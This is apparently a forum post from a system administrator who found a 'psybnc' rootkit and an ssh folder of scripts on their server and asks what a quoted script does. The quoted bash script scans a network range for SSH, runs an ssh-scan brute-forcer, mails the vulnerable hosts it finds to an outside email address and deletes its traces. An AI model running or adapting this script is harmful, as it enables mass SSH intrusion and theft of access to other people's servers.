What dose this rootkit do?
I found a rootkit named "psybnc" alomg with the ssh folder wich has lots of scripts inside ...
I opened some scripts ..they have IPs in my subnet.....
Like a script inside has following code...
-------------------------------------------------------------
#!/bin/bash
if [ $# != 1 ]; then
echo " usage: $0 <b class>"
exit;
fi
echo " Versiune de scaner privata!"
echo "----------------------------------------------------"
echo " All my love for PIZDE "
echo "----------------------------------------------------"
echo "# incep scanarea Morpheuse..."
./pscan2 $1 22
sleep 10
cat $1.pscan.22 |sort |uniq > mfu.txt
oopsnr2=`grep -c . mfu.txt`
echo "# Am gasit $oopsnr2 de servere"
echo "----------------------------------------"
echo "# Incepem Sa Terminam
..."./ssh-scan 50
cat vuln.txt | mail -s "Dosare root" dorofteig@yahoo.com
rm -rf $1.pscan.22 mfu.txt
echo "Asta a fost tot"
--------------------------------------------------------------------------
I need to know is it someting a SSH rootkit ...or else...
Thanks in advance...
